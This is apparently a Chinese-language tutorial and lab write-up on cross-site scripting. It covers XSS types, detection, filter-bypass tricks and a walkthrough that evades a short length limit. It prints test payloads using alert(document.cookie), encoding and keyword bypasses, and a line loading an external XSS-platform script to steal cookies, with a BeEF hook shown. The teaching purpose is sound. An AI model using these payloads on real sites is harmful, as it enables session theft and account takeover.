XSS知识点和20字符短域名绕过
XSS知识点和20字符短域名绕过
XSS的原理和分类
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表CSS(Cascading Style Sheets)重名,故缩写为XSS。
XSS属于被动式的攻击: 因为其被动且不好利用,所以许多人常呼略其危害性。
XSS漏洞的问题原因: 主要是由于开发人员对XSS了解不足,安全的意识不够造成的,因为没有对用户的输入进行一个合法的过滤或者没有过滤完善,导致用户把相应的恶意代码输入的了页面当中。
XSS攻击的主要目的: 想办法获取目标攻击网站的cookie,因为有了cookie相当于有了seesion,有了这些信息就可以在任意能接进互联网的pc登陆该网站,并以其他人的生份登陆,做一些破坏。
预防措施: 防止下发界面显示html标签,把等符号转义。请记住两条原则:过滤输入和转义输出。
XSS漏洞分类
1.反射型XSS
反射型XSS的危害并不是那么大,因为反射型XSS不会插入数据库中,也并不持久,它只能运行一次就结束了。用户提交的数据中可以构造代码来执行,从而实现窃取用户信息等攻击。 需要诱使用户“点击”一个恶意链接,才能攻击成功。
2.DOM型
DOM-basedXSS漏洞是基于文档对象模型(Document Object Model)的一种漏洞。这种XSS与反射型XSS、持久型XSS在原理上有本质区别,它的攻击代码并不需要服务器解析响应,触发XSS靠的是浏览器端的DOM解析。客户端上的JavaScript脚本可以访问浏览器的DOM并修改页面的内容,不依赖服务器的数据,直接从浏览器端获取数据并执行。
在客户端直接输出DOM内容的时候极易触发DOM型XSS漏洞,如
document.getElementByld(“x’).innerHTML、document.write)等。
3.储存型
存储型XSS又叫持久型。一般而言,它三种XSS里危害最大的一种。此类型的XSS漏洞是由于恶意攻击代码被持久化保存到服务器上,然后被显示到HTML页面之中。这类漏洞经常出现在用户评论的页面,攻击者精心构造XSS代码,保存到数据库中,当其他用户再次访问这个页面时,就会触发并执行恶意的XSS代码,从而窃取用户的敏感信息。它的利用过程如图所示。
DOM型和反射型的区别
反射型XSS:通过诱导用户点击,我们构造好的恶意payload才会触发的XSS。 反射型XSS的检测我们在每次请求带payload的链接时页面应该是会带有特定的畸形数据的。
DOM型:通过修改页面的DOM节点形成的XSS。 DOM-based XSS由于是通过js代码进行dom操作产生的XSS,所以在请求的响应中我们甚至不一定会得到相应的畸形数据。 根本区别在我看来是输出点的不同。
XSS漏洞查找方法
1. 黑盒测试
所谓黑盒测试, 就是在不知道系统的代码和运行状态的条件下,对系统进行的测试。在对XSS漏洞的检测中,我们可以模拟黑客的攻击手段,在所有可能的数据输入接口处,尝试 进行一些XSS注入。通过观察注入后的引用这些数据的页面,看其是否出现被注入的现象,即可确实是否存在XSS漏洞。比如我们可以用下面所列的一些脚本来 尝试XSS注入:
><script>alert(document.cookie)</script>
=’><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<script>alert(’XSS’)</script>
<imgsrc=/uploadfile/2015/0301/20150301105236644.png” nerror=”alert(’XSS’)”>
2. 静态分析
静态分析方法属于白盒测试方法的一种,它通过对Web应用的代码进行分析,从而发现其中可能存在的问题。
3. 数据流分析
XSS 之所以产生,根本原因在于不安全的数据流, 使得用户的输入数据被直接嵌入到某些页面中。比如PHP中的echo语句,就能够将一些数据直接添加为 HTML页面的一部分,如果这个数据是用户注入了XSS脚本的数据,则会导致产生XSS攻击。因此,数据流分析的主要思想就是使用一些模型或者工具,分析 Web应用程序代码中的数据传输情况,从而发现其中存在的问题。
常用的绕过方法
- 大小写绕过
- 双写绕过
=alert(/xss/); - 替换绕过
alert可用prompt,confirm,top['alert'](1)
()可用 ``代替
空格可用%0a,%0d,/**/; html的标签内分割两部分还可以用/
字符ſ(ord=383)转为大写为S
- 编码绕过
url编码
html实体 t t 等
javascript字符编码 八进制\164 十六进制\x0074
- js的String.fromCharCode方法获得字符串 javascript
- 注释绕过
JavaScript注释 // /**/
html注释 <!-- --> <!-- --!>
- @符号绕过url限制http://test:[email protected]
- 宽字节绕过等…
20字符短域名绕过
首先在创建新相册名字的时候,我们先随意输出,
F12看到这里将他将刚刚输入的值传到了a标签里面
所以就看一下源文档,可以看出来他是直接输出URL的地址,并且看到了添加相册是后走的是add方法,并且过滤了两端的空格,还默认了必须填写,并且默认长度为45。并且使用了xss-clean
xss-clean:将一些符号过滤成为一些实体,并将一些关键字进行了过滤,
因为说到这个过滤了很多标签,所以我们先将xss-clean删掉,然后再创建名称出填写:< script >标签。
回到目录页面的时候他会出现弹窗,是因为他在创建的时候已经入库了,所以每一次进入的时候,他都是访问的。
这里就说明可以使用js代码。
所以我么为了获取到对方的cookie,我们来尝试使用>$.getScript(“//trlsm.xss.ht”),
但是从图片可以看到我们使用最短的绕过方式,他也是字节太长,所以我们就是要修改这个的长度,
在源码当中我们规定的最长字符长度是:35
虽然xss-clean过滤了很多标签,但是他还没有过滤掉< svg >标签,所以我们使用< svg>标签进行一个测试。
也就是可以找到一个svg的标签,来进行绕过。
但是这些个必备的命令已经有29个字符了,所以只能将域名缩短。
但是短域名的方式来实现,说以这里有一个知识点:
用短字符来绕过字符限制:这种的话比如说tel正常是3个字节,但是写成这样后℡,他会把他当成是一个字节来用。所以这样就尽可能的为我们节省了字符长度。
ff expands to ff
℠ expands to sm
㏛ expands to sr
st expands to st
㎭ expands to rad
℡ expands to tel
然后我尝试了用老师的域名来弄,但是因为没有文件什么的,也不能修改外网ip为本机的,然后我有没有自己的域名,所以我只能尝试放宽字符限制长度使用ip进行测试。可以看见beef上出现了。
